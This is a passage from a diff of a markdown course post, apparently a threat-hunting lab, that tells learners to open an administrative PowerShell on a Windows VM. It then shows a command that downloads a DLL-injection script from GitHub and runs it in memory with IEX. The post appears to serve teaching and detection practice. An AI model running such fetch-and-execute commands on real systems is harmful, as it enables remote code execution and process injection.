faanross/faanross.github.io/content/posts/course01.md

 The original link, as well as a reference to where I found the fix, can be found in the opening comments in the script itself, feel free to [refer to them](https://raw.githubusercontent.com/faanross/threat.hunting.course.01.resources/main/Invoke-DllInjection-V2.ps1) if you want.

 **OK, so now let's go ahead and download + inject the script into memory:**
-1. On our Windows VM we'll open an administrative PowerShell terminal - a reminder that in order to do so you have to right-click on PowerShell and select `Run as Administrator`.
+1. On our Windows VM we'll open an administrative PowerShell terminal.
 2. Now we'll run the following command, as mentioned before: it's going to download a script hosted on a web server (GitHub in this case) and then inject it directly into memory.
 ```
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/faanross/threat.hunting.course.01.resources/main/Invoke-DllInjection-V2.ps1')